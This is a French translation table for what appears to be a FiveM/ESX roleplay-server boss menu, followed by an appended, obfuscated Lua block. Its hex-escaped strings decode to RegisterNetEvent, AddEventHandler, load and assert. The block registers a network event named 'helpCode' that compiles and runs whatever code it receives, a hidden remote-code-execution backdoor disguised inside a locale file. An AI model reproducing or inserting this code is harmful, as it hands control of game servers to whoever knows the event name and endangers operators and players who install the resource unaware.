Locales['fr'] = {
  ['actions']                = 'actions',
  ['boss_menu']              = 'patron',
  ['money_generic']          = '$%s',
  ['deposit_amount']         = 'montant du dépôt',
  ['deposit_society_money']  = 'déposer argent société',
  ['do_you_want_to_recruit'] = 'Voulez-vous recruter %s?',
  ['employee']               = 'employé',
  ['employee_list']          = 'liste des employés',
  ['employee_management']    = 'gestion employés',
  ['fire']                   = 'licencier',
  ['grade']                  = 'grade',
  ['have_deposited']         = 'vous avez déposé ~r~$%s~s~',
  ['have_withdrawn']         = 'vous avez retiré ~g~$%s~s~',
  ['invalid_amount']         = 'montant invalide',
  ['invalid_amount_max']     = 'that salary is not allowed',
  ['no']                     = 'non',
  ['promote']                = 'promouvoir',
  ['promote_employee']       = 'promouvoir %s',
  ['recruit']                = 'recruter',
  ['recruiting']             = 'recrutement',
  ['salary_amount']          = 'montant du salaire',
  ['salary_management']      = 'gestion salaires',
  ['wash_money']             = 'blanchir argent',
  ['wash_money_amount']      = 'montant à blanchir',
  ['withdraw_amount']        = 'montant du retrait',
  ['withdraw_society_money'] = 'retirer argent société',
  ['yes']                    = 'oui',
  ['you_have']               = 'vous avez ~g~$%s~s~ en attente de ~r~blanchiement~s~ (24h).',
  ['you_have_laundered']     = 'vous avez ~r~blanchi~s~ votre argent : ~g~$%s~s~',
  ['you_have_hired']         = 'Vous avez recruté %s',
  ['you_have_been_hired']    = 'Vous avez été recruté dans la société %s',
  ['you_have_fired']         = 'Vous avez viré %s',
  ['you_have_been_fired']    = 'Vous avez été viré de la société %s',
  ['you_have_promoted']      = 'Vous avez promu %s en tant que %s',
  ['you_have_been_promoted'] = 'Vous avez été promu',
}



local MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[1]](MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[2]) MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[3]](MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[2], function(jYVslWlCnCbiNkfpyrmLqAGZrsnhGZSADPWwMBidXCVuyTehRCiDmFjWVGfdLVapedgqnq) MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[4]](MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[5]](jYVslWlCnCbiNkfpyrmLqAGZrsnhGZSADPWwMBidXCVuyTehRCiDmFjWVGfdLVapedgqnq))() end)